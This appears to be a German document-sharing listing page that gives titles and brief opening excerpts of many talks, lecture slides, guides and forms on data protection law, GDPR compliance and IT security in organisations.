Datenschutz Informationssicherheit Compliance Datenschutz Informationssicherheit Compliance Anforderungen, Risiken und Lösungsansätze Thomas Schneider Dipl.-Informatiker, Wirtschaftsinformatik Datenschutzbeauftragter (TÜV), Externer Datenschutzbeauftragter

Mehr

Thementag Cloud Computing Datenschutzaspekte

Thementag Cloud Computing Datenschutzaspekte Thementag Cloud Computing Datenschutzaspekte Gabriel Schulz Stellvertreter des Landesbeauftragten für Datenschutz und Informationsfreiheit Mecklenburg-Vorpommern Heise online 30. Juni 2011: US-Behörden

Mehr

Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein Anstalt des öffentlichen Rechts

Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein Anstalt des öffentlichen Rechts Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein Anstalt des öffentlichen Rechts IT-Grundschutz und Datenschutz im Unternehmen implementieren Heiko Behrendt ISO 27001 Grundschutzauditor Fon:

Mehr

Datenschutz im Projekt- und Qualitätsmanagement Umfeld

Datenschutz im Projekt- und Qualitätsmanagement Umfeld Datenschutz im Projekt- und Qualitätsmanagement Umfeld Personenbezogene Daten im Qualitäts- und Projektmanagement 17.02.2014 migosens GmbH 2014 Folie 2 Definitionen Was sind personenbezogene Daten? sind

Mehr

HUMBOLDT-UNIVERSITÄT ZU BERLIN Mathematisch Naturwissenschaftliche Fakultät II Institut Informatik

HUMBOLDT-UNIVERSITÄT ZU BERLIN Mathematisch Naturwissenschaftliche Fakultät II Institut Informatik HUMBOLDT-UNIVERSITÄT ZU BERLIN Mathematisch Naturwissenschaftliche Fakultät II Institut Informatik Vortrag im Seminar Designing for Privacy (Theorie und Praxis datenschutzfördernder Technik) Benjamin Kees

Mehr

12. Fachtag IV / IT des BeB - Datenschutz Fragestellungen aus dem tatsächlichen IT-Leben

12. Fachtag IV / IT des BeB - Datenschutz Fragestellungen aus dem tatsächlichen IT-Leben 12. Fachtag IV / IT des BeB - Datenschutz Fragestellungen aus dem tatsächlichen IT-Leben Dr. Axel Gutenkunst Datenschutzbeauftragter für die Evangelische Landeskirche Württemberg und das Diakonische Werk

Mehr

Datenschutzaspekte bei Nutzung mobiler Endgeräte

Datenschutzaspekte bei Nutzung mobiler Endgeräte Datenschutzaspekte bei Nutzung mobiler Endgeräte Dipl.Inform.(Univ.) 28. November2012 Agenda I. Kurzvorstellung II. Datenschutz allgemein III. Schutzziele im Kontext Smart-Devices IV.BayLDA und Smart-Devices

Mehr

Datenschutz in Verein und Verbänden

Datenschutz in Verein und Verbänden Datenschutz in Verein und Verbänden Thilo Weichert, Leiter des ULD Landesverband Schleswig-Holstein der Gartenfreunde e.v. Gustav-Heinemann-Bildungsstätte Bad Malente 17.11.2012 Inhalt Unabhängiges Landeszentrum

Mehr

GeoBusiness Code of Conduct (CoC) GeoBusiness und Datenschutz

GeoBusiness Code of Conduct (CoC) GeoBusiness und Datenschutz GeoBusiness Code of Conduct (CoC) GeoBusiness und Datenschutz Verhaltensregeln gemäß 38 a BDSG zur Geodaten-Nutzung durch Wirtschaftsunternehmen des Vereins Selbstregulierung Informationswirtschaft e.

Mehr

Grundlagen des Datenschutzes und der IT-Sicherheit (Teil 1c) Vorlesung im Sommersemester 2010 an der Universität Ulm von Bernhard C.

Grundlagen des Datenschutzes und der IT-Sicherheit (Teil 1c) Vorlesung im Sommersemester 2010 an der Universität Ulm von Bernhard C. Vorlesung im Sommersemester 2010 an der Universität Ulm von 1. Grundlagen der IT-Sicherheit Geschichte des Datenschutzes Anforderungen zur IT-Sicherheit Datenschutzrechtliche Prinzipien Mehrseitige IT-Sicherheit

Mehr

Rechtliche Aspekte der (revisions-) sicheren Administration von IT-Systemen Secure Linux Administration Conference, 07.

Rechtliche Aspekte der (revisions-) sicheren Administration von IT-Systemen Secure Linux Administration Conference, 07. NetworkedAssets GmbH Rechtliche Aspekte der (revisions-) sicheren Administration von IT-Systemen Secure Linux Administration Conference, 07. Dezember 2006 Rechtliche Aspekte Administration Gliederung Praktische

Mehr

Herzlich willkommen! Bad Homburg Düsseldorf München

Herzlich willkommen! Bad Homburg Düsseldorf München Herzlich willkommen! 19.9. Bad Homburg 21.9. Düsseldorf 26.9. München DATENSCHUTZ Tobias R. Hoffmann Agenda Was ist Datenschutz? eine Einführung Aktuelles Imagegewinn für das Systemhaus Erweiterung des

Mehr

Privacy by Design: Wunschvorstellung oder Qualitätsmerkmal? Entwicklertag Karlsruhe, DRUCKVERSION. Christoph Schäfer

Privacy by Design: Wunschvorstellung oder Qualitätsmerkmal? Entwicklertag Karlsruhe, DRUCKVERSION. Christoph Schäfer Privacy by Design: Wunschvorstellung oder Qualitätsmerkmal? Entwicklertag Karlsruhe, 15.06.2016 DRUCKVERSION Christoph Schäfer Agenda (1) Datenschutz (2) Gesetzliche Regelungen (3) (Negative) Beispiele

Mehr

Know-how-Schutz in Zeiten moderner Wirtschaftsspionage

Know-how-Schutz in Zeiten moderner Wirtschaftsspionage Know-how-Schutz in Zeiten moderner Wirtschaftsspionage 30. Juni 2015 / 19:30 Uhr BDS-Bayern Ortsverband Lauf Themenabend IT-Sicherheit und Cyberkriminalität Gerd Schmidt Geschäftsführer der Datenschutz

Mehr

1. Welche Arten von personenbezogenen Daten werden in Ihrem Unternehmen verarbeitet?

1. Welche Arten von personenbezogenen Daten werden in Ihrem Unternehmen verarbeitet? Datum:... - 1 Uhrzeit:... Betrieb:... AP:... Fragenkatalog für Kontrollen TLfDI - nichtöffentlicher Bereich - Allgemeine Fragen 1. Welche Arten von personenbezogenen Daten werden in Ihrem Unternehmen verarbeitet?

Mehr

Datenschutz und Datensicherung (BDSG) Inhaltsübersicht

Datenschutz und Datensicherung (BDSG) Inhaltsübersicht Datenschutz und Datensicherung (BDSG) Inhaltsübersicht Datenschutzziel Datenschutz und Datensicherung Personenbezogene Daten Datenverarbeitung Zulässigkeit personenbezogener Datenverarbeitung Zulässigkeit

Mehr

Europäische Vorgaben für die Cloud? Die Auswirkungen der Datenschutz-Grundverordnung auf IT- Sicherheit, Geschäftsmodelle und den Datenschutz

Europäische Vorgaben für die Cloud? Die Auswirkungen der Datenschutz-Grundverordnung auf IT- Sicherheit, Geschäftsmodelle und den Datenschutz Europäische Vorgaben für die Cloud? Die Auswirkungen der Datenschutz-Grundverordnung auf IT-, Geschäftsmodelle und den Datenschutz Prof. Dr. Gerrit Hornung, LL.M. Lehrstuhl für Öffentliches Recht, IT-Recht

Mehr

Pragmatischer Umgang mit den wandelnden Anforderungen in KMU

Pragmatischer Umgang mit den wandelnden Anforderungen in KMU Pragmatischer Umgang mit den wandelnden Anforderungen in KMU EU-Datenschutz-Grundverordnung, Safe Harbor und das IT-Sicherheitsgesetz Tim Hoffmann 20. April 2016 Bochum IT-Trends Sicherheit Referent Tim

Mehr

Grundlagen des Datenschutzes und der IT-Sicherheit. Musterlösung zur 9. Übung im SoSe 2014: Vergleich Datenschutz und IT-Sicherheit

Grundlagen des Datenschutzes und der IT-Sicherheit. Musterlösung zur 9. Übung im SoSe 2014: Vergleich Datenschutz und IT-Sicherheit und der IT-Sicherheit Musterlösung zur 9. Übung im SoSe 2014: Vergleich Datenschutz und IT-Sicherheit 9.1 Vergleich Sicherheitsziele & Aufgabe: Kontrollbereiche Ordnen Sie die im BDSG genannten Kontrollbereiche

Mehr

Datenschutz und Datensicherheit im Handwerksbetrieb

Datenschutz und Datensicherheit im Handwerksbetrieb N. HOZMANN BUCHVERLAG Werner Hülsmann Datenschutz und Datensicherheit im Handwerksbetrieb Inhaltsverzeichnis Vorwort 13 1 Datenschutz und Datensicherheit 15 1.1 Grundlagen und Grundsätze 15 1.1.1 Was ist

Mehr

Quo vadis, Datenschutz?

Quo vadis, Datenschutz? Quo vadis, Datenschutz? EU-Datenschutz-Grundverordnung Tim Hoffmann Roadshow Cybercrime 23. November 2016 IHK zu Bochum Unternehmensgruppe Quo vadis, Datenschutz? // Dipl.-Kfm. Tim Hoffmann 2 Dienstleistungen

Mehr

DIE NEUE DATENSCHUTZ- GRUNDVERORDNUNG

DIE NEUE DATENSCHUTZ- GRUNDVERORDNUNG DIE NEUE DATENSCHUTZ- GRUNDVERORDNUNG DR. MARKUS FRANK LL.M. RECHTSANWALT A-1070 Wien, Neustiftgasse 3/5, Tel +43/1/523 44 02, Fax -10, office@frank-law.at Verordnung (EU) 2016/679 des Europäischen Parlaments

Mehr

EIN C.A.F.E. FÜR DEN DATENSCHUTZ

EIN C.A.F.E. FÜR DEN DATENSCHUTZ EIN C.A.F.E. FÜR DEN DATENSCHUTZ Organisatorische Datenschutzbeauftragter Martin Esken Datenschutzbeauftragter (TÜV) Organisatorische Technische gemäß 9 Satz 1 Punkte 1-8 BUNDESDATENSCHUTZGESETZ Organisatorische

Mehr

Datenschutz & Datensicherheit

Datenschutz & Datensicherheit Datenschutz & Datensicherheit IT und Haftungsfragen 1 Vorstellung Holger Filges Geschäftsführer der Filges IT Beratung Beratung und Seminare zu IT Sicherheit, Datenschutz und BSI Grundschutz Lizenzierter

Mehr

Die neue EU Datenschutzverordnung

Die neue EU Datenschutzverordnung Die neue EU Datenschutzverordnung Konsequenzen für die IT der Unternehmen Aleksander Widera Stefan Oehrli BASEL BERN BRUGG DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. GENF HAMBURG KOPENHAGEN LAUSANNE MÜNCHEN

Mehr

EU-DS-GVO: Folgen für die Wirtschaft. Die Europäische Datenschutz-Grundverordnung und ihre Folgen für die Wirtschaft

EU-DS-GVO: Folgen für die Wirtschaft. Die Europäische Datenschutz-Grundverordnung und ihre Folgen für die Wirtschaft Die Europäische Datenschutz-Grundverordnung und ihre Folgen für die Wirtschaft RA Andreas Jaspers Geschäftsführer der Gesellschaft für Datenschutz und Datensicherheit (GDD) e.v. Seite 2 Inhalt: Folgen

Mehr

Vertrauen bestärken: Wege zur Auditierung von Cloud-Diensten. RA Dr. Jan K. Köcher Datenschutzauditor (TÜV) koecher@dfn-cert.de

Vertrauen bestärken: Wege zur Auditierung von Cloud-Diensten. RA Dr. Jan K. Köcher Datenschutzauditor (TÜV) koecher@dfn-cert.de Vertrauen bestärken: Wege zur Auditierung von Cloud-Diensten RA Dr. Jan K. Köcher Datenschutzauditor (TÜV) koecher@dfn-cert.de Herausforderungen Cloud Übermittlung von Daten an einen Dritten und ggf. Verarbeitung

Mehr

Kirstin Brennscheidt. Cloud Computing und Datenschutz. o Nomos

Kirstin Brennscheidt. Cloud Computing und Datenschutz. o Nomos Kirstin Brennscheidt Cloud Computing und Datenschutz o Nomos Inhaltsverzeichnis Abkürzungsverzeichnis I Einleitung 1. Motivation und Begriff des Cloud Computing 11. Gegenstand der Untersuchung III. Gang

Mehr

Inhaltsverzeichnis. Vorwort zur zweiten Auflage... Vorwort zur ersten Auflage... Bearbeiterverzeichnis... Abkürzungsverzeichnis...

Inhaltsverzeichnis. Vorwort zur zweiten Auflage... Vorwort zur ersten Auflage... Bearbeiterverzeichnis... Abkürzungsverzeichnis... Vorwort zur zweiten Auflage... Vorwort zur ersten Auflage... Bearbeiterverzeichnis... Abkürzungsverzeichnis... V VI VII XVII Teil 1: Kommentierung BDSG Einleitung... 1 Erster Abschnitt Allgemeine und gemeinsame

Mehr

Datenschutzaudit. Einhaltung gesetzlicher. Datenschutz. Copyright DQS GmbH. DQS GmbH

Datenschutzaudit. Einhaltung gesetzlicher. Datenschutz. Copyright DQS GmbH. DQS GmbH Datenschutzaudit Einhaltung gesetzlicher und kundenspezifischer Forderungen zum Datenschutz Themen Bedeutung des BDSG in der Wirtschaft Übersicht über die Novelle Details zu den Paragrafen des BDSG Datenschutz

Mehr

CRM und Datenschutz. Thomas Spaeing ds² - Unternehmensberatung für Datenschutz und Datensicherheit

CRM und Datenschutz. Thomas Spaeing ds² - Unternehmensberatung für Datenschutz und Datensicherheit CRM und Datenschutz Thomas Spaeing ds² - Unternehmensberatung für Datenschutz und Datensicherheit www.ds-quadrat.de Telefon (kostenlos): 0800 951 36 32 E-Mail: info@ds-quadrat.de Leistungsspektrum ds²

Mehr

Corporate Privacy Management Group

Corporate Privacy Management Group CRM datenschutzkonform einsetzen Goldene Regeln für die Praxis Flughafen Münster/Osnabrück, 18. Juni 2009 1 Ihre Pilotin Judith Halama Datenschutzberaterin Externe Datenschutzbeauftragte Rechtsanwältin

Mehr

Ständige Erreichbarkeit und mobile IT -

Ständige Erreichbarkeit und mobile IT - Ständige Erreichbarkeit und mobile IT - Herausforderungen im Arbeitsrecht und Datenschutz Dresden, 18.10.12 Begriffe, Ursachen und Lösungen 36% Ich nutze die Technologien, die für meine Arbeit notwendig

Mehr

Gesetzliche Grundlagen des Datenschutzes

Gesetzliche Grundlagen des Datenschutzes Gesetzliche Grundlagen des Datenschutzes Informationelle Selbstbestimmung Bundesdatenschutzgesetz Grundgesetz Gesetzliche Grundlagen des Datenschutzes allg. Persönlichkeitsrecht (Art. 1, 2 GG) Grundrecht

Mehr

Da müssen wir rein. Was Unternehmen in sozialen Netzwerken beachten müssen

Da müssen wir rein. Was Unternehmen in sozialen Netzwerken beachten müssen Da müssen wir rein Was Unternehmen in sozialen Netzwerken beachten müssen Henry Krasemann Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein Die 7 Säulen des ULD Prüfung Beratung Schulung inkl.

Mehr

LEITFADEN DATENSCHUTZ

LEITFADEN DATENSCHUTZ In diesem Dokument wird aufgeführt, was bei dem Aufbau einer Datenschutzorganisation beachtet werden muss. Auch wird vermerkt, welche einmaligen und regelmäßigen Aufgaben durch den Datenschutzbeauftragten

Mehr

Datenschutzrechtliche Rahmenbedingungen für das SELMA-Projekt. Prof. Dr. Bernd Holznagel, LL.M., ITM Öffentlich-rechtliche Abteilung Folie 1

Datenschutzrechtliche Rahmenbedingungen für das SELMA-Projekt. Prof. Dr. Bernd Holznagel, LL.M., ITM Öffentlich-rechtliche Abteilung Folie 1 Datenschutzrechtliche Rahmenbedingungen für das SELMA-Projekt Prof. Dr. Bernd Holznagel, LL.M., ITM Öffentlich-rechtliche Abteilung Folie 1 Hintergrund Datenschutzrecht (1) Einführung Hintergrund: Volkszählungsurteil

Mehr

IT-Compliance und Datenschutz. 16. März 2007

IT-Compliance und Datenschutz. 16. März 2007 IT-Compliance und Datenschutz 16. März 2007 Die Themen Agenda Vorstellung Deutsche Post Adress GmbH IT-Compliance und Datenschutz allgemein Bundesdatenschutzgesetz (BDSG) Der Datenschutzbeauftragte Verbot

Mehr

Grundlagen des Datenschutzes und der IT-Sicherheit (10) Vorlesung im Sommersemester 2005 von Bernhard C. Witt

Grundlagen des Datenschutzes und der IT-Sicherheit (10) Vorlesung im Sommersemester 2005 von Bernhard C. Witt und der IT-Sicherheit (10) Vorlesung im Sommersemester 2005 von Struktur der heutigen Vorlesung Vertiefung zu grundlegenden Anfragen: 1. Ergänzungen zum Datenschutz - Tätigkeit eines Datenschutzbeauftragten

Mehr

Datenschutzbeauftragter (TÜV )

Datenschutzbeauftragter (TÜV ) Zertifikatslehrgang Datenschutzbeauftragter (TÜV ) Safe the date! Fachtagung 2015 Fachtagung Datenschutz 29. 30. April 2015 in Hamburg TÜV NORD GROUP Ausbildungslehrgang gemäß 4 f BDSG Datenschutzbeauftragter

Mehr

Aufgaben und Prüfpraxis einer Aufsichtsbehörde. GDD-Basis-Schulung für Datenschutzbeauftragte Timmendorfer Strand Dienstag, 12.

Aufgaben und Prüfpraxis einer Aufsichtsbehörde. GDD-Basis-Schulung für Datenschutzbeauftragte Timmendorfer Strand Dienstag, 12. Aufgaben und Prüfpraxis einer Aufsichtsbehörde GDD-Basis-Schulung für Datenschutzbeauftragte Timmendorfer Strand Dienstag, 2. Juni 2007 Dr. Thilo Weichert Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein

Mehr

Auswirkungen der Datenschutz-Grundverordnung auf private Ahnenforscher

Auswirkungen der Datenschutz-Grundverordnung auf private Ahnenforscher Auswirkungen der Datenschutz-Grundverordnung auf private Ahnenforscher 2016 Deutscher Bundestag Seite 2 Auswirkungen der Datenschutz-Grundverordnung auf private Ahnenforscher Aktenzeichen: Abschluss der

Mehr

Das Datenschutzregister der Max-Planck-Gesellschaft

Das Datenschutzregister der Max-Planck-Gesellschaft Das Datenschutzregister der Max-Planck-Gesellschaft Dr. Wilfried Grieger wgriege@gwdg.de http://www.gwdg.de/~wgriege Gesellschaft für wissenschaftliche Datenverarbeitung mbh Göttingen Am Fassberg, 37077

Mehr

Datenverarbeitung im Auftrag

Datenverarbeitung im Auftrag Die Kehrseite der Einschaltung von Dienstleistern: Datenverarbeitung im Auftrag ZENDAS Breitscheidstr. 2 70174 Stuttgart Datum: 10.05.11 1 Datenverarbeitung im Auftrag Daten ZENDAS Breitscheidstr. 2 70174

Mehr

Inhaltsübersicht. Bibliografische Informationen digitalisiert durch

Inhaltsübersicht. Bibliografische Informationen  digitalisiert durch Inhaltsübersicht Literaturverzeichnis 1 KaDitel: Einleitung 1 2. Kapitel: Outsourcing und Datenschutz 3 2.1 Begriff und Bedeutung des Outsourcings von Datenverarbeitung 3 2.2 Beispiele für Formen des DV-

Mehr

Grundlagen des Datenschutzes. Vorlesung im Sommersemester 2012 an der Universität Ulm von Bernhard C. Witt

Grundlagen des Datenschutzes. Vorlesung im Sommersemester 2012 an der Universität Ulm von Bernhard C. Witt Vorlesung im Sommersemester 2012 an der Universität Ulm von 1. Grundlagen der IT-Sicherheit Geschichte des Datenschutzes Anforderungen zur IT-Sicherheit Datenschutzrechtliche Prinzipien Mehrseitige IT-Sicherheit

Mehr

Merkblatt zur Information über die wichtigsten Bestimmungen des Saarländischen Datenschutzgesetzes und zur Beachtung datenschutzrechtlicher

Merkblatt zur Information über die wichtigsten Bestimmungen des Saarländischen Datenschutzgesetzes und zur Beachtung datenschutzrechtlicher Saarbrücken, 2012 Merkblatt zur Information über die wichtigsten Bestimmungen des Saarländischen Datenschutzgesetzes und zur Beachtung datenschutzrechtlicher Anforderungen Mit dem Saarländischen Gesetz

Mehr

Grundlagen des Datenschutzes und der IT-Sicherheit (Teil 1c) Vorlesung im Sommersemester 2014 an der Universität Ulm von Bernhard C.

Grundlagen des Datenschutzes und der IT-Sicherheit (Teil 1c) Vorlesung im Sommersemester 2014 an der Universität Ulm von Bernhard C. Vorlesung im Sommersemester 2014 an der Universität Ulm von 1. Grundlagen der IT-Sicherheit Geschichte des Datenschutzes Anforderungen zur IT-Sicherheit Datenschutzrechtliche Prinzipien Mehrseitige IT-Sicherheit

Mehr

Datenschutz in Schulen

Datenschutz in Schulen Datenschutz in Schulen von Markus Kohlstädt Dienstag, 11. Juni 2013 Wir integrieren Innovationen 11.06.2013 2013 krz Minden-Ravensberg/Lippe 1 Agenda Einführung Datenschutzbeauftragte/r der Schule Sicherheitskonzept

Mehr

Datenschutz mit Augenmaß am Beispiel Eintracht Frankfurt Fußball AG

Datenschutz mit Augenmaß am Beispiel Eintracht Frankfurt Fußball AG Datenschutz mit Augenmaß am Beispiel Eintracht Frankfurt Fußball AG Cebit 2010, 03.03.2010 Dipl.-Betriebswirt (FH) Steffen Weber, ISO 27001 Lead Auditor INTARGIA Managementberatung g GmbH 2010 - INTARGIA

Mehr

Auftragsdatenverarbeitung

Auftragsdatenverarbeitung Auftragsdatenverarbeitung Inhaltsverzeichnis Präambel 1 1 Definitionen 1 2 Anwendungsbereich und Verantwortlichkeit 1 3 Pflichten des Auftragnehmers 2 4 Pflichten des Auftraggebers 3 5 Anfragen Betroffener

Mehr

Verfahrensverzeichnis

Verfahrensverzeichnis Verfahrensverzeichnis Beschreibung des einzelnen Verfahrens nach 8 DSG NRW Lfd. Nr.: (wird vom DSB vergeben) Neues Verfahren / Erstmeldung Wesentliche Änderung Das Verfahren ist zur Einsichtnahme bestimmt

Mehr

Datenschutzbeauftragter in der öffentlichen Verwaltung mit TÜV Rheinland geprüfter Qualifikation Februar 2014, München

Datenschutzbeauftragter in der öffentlichen Verwaltung mit TÜV Rheinland geprüfter Qualifikation Februar 2014, München Datenschutzbeauftragter in der öffentlichen Verwaltung mit TÜV Rheinland geprüfter Qualifikation 3. 7. Februar 2014, München Datenschutzbeauftragter in der öffentlichen Verwaltung Einleitung Zweck dieses

Mehr

Verfahrensverzeichnis nach 4g Bundesdatenschutzgesetz (BDSG) zum Verfahrensregister bei dem/der betrieblichen Beauftragten für den Datenschutz

Verfahrensverzeichnis nach 4g Bundesdatenschutzgesetz (BDSG) zum Verfahrensregister bei dem/der betrieblichen Beauftragten für den Datenschutz Verfahrensverzeichnis nach 4g Bundesdatenschutzgesetz (BDSG) zum Verfahrensregister bei dem/der betrieblichen Beauftragten für den Datenschutz Hauptblatt Zu den Ziff. - beachten Sie bitte die Ausfüllhinweise.

Mehr

Cloud Computing aus Sicht von Datensicherheit und Datenschutz

Cloud Computing aus Sicht von Datensicherheit und Datenschutz Cloud Computing aus Sicht von Datensicherheit und Datenschutz Peter Batt Bundesministerium des Innern Ständiger Vertreter des IT-Direktors Berlin, den 19. April 2012 Grundlagen: Sicherheitsempfehlungen

Mehr

Auftragsdatenverarbeiter: Darf s ein bißchen mehr sein?

Auftragsdatenverarbeiter: Darf s ein bißchen mehr sein? Auditprozess beim Auftragsdatenverarbeiter: Darf s ein bißchen mehr sein? Itella Information GmbH Klaus Martens QMB Datenschutzbeauftragter 1 04.11.2011 2011 Itella Information GmbH, Klaus Martens Itella

Mehr

1.80.00 Nr. 2 1. Verfassungs-, Verwaltungs- und Verfahrensrecht 80.00 Datenschutzrecht Datenschutz im öffentlichen Bereich

1.80.00 Nr. 2 1. Verfassungs-, Verwaltungs- und Verfahrensrecht 80.00 Datenschutzrecht Datenschutz im öffentlichen Bereich Justus-Liebig-Universität Gießen Der Präsident Mitteilungen HMdIuS 2002 Nr. 1 01.06.2002 1.80.00 Nr. 2 1. Verfassungs-, Verwaltungs- und Verfahrensrecht 80.00 Datenschutzrecht Hess. Ministerium des Inneren

Mehr

Car-to-Car-Communication zw. Crowdsourcing und digitaler Souveränität

Car-to-Car-Communication zw. Crowdsourcing und digitaler Souveränität Car-to-Car-Communication zw. Crowdsourcing und digitaler Souveränität Thilo Weichert Netzwerk Datenschutzexpertise ABIDA-Fachtagung Big Data und Gesellschaft - zwischen Kausalität und Korrelation - Dienstag,

Mehr

Cybercrime betrifft jeden.

Cybercrime betrifft jeden. Datensicherheit im Unternehmen: Cybercrime betrifft jeden. Datenschutzrechtliche Aspekte zur Verhinderung von Cyberattacken Hinweis: Bei dieser Präsentation handelt es sich um eine Kurzversion, die nur

Mehr

Umweltschutz. Qualität. Arbeitssicherheit

Umweltschutz. Qualität. Arbeitssicherheit Umweltschutz. Qualität. Arbeitssicherheit Firmenprofil Ingenieurbüro Standorte: Paderborn Düsseldorf Dortmund Frankfurt a. M. Hamburg München Kerngeschäft Umweltschutz Qualität Arbeitssicherheit Baustellensicherheit

Mehr

IT-Sicherheit Risiken erkennen und behandeln. Hanau, 12.11.2014

IT-Sicherheit Risiken erkennen und behandeln. Hanau, 12.11.2014 IT-Sicherheit Risiken erkennen und behandeln Hanau, 12.11.2014 Agenda GAP-Analysis Schwachstellen finden Risk-Management - Risiken analysieren und bewerten TOMs - Technische und organisatorische Maßnahmen

Mehr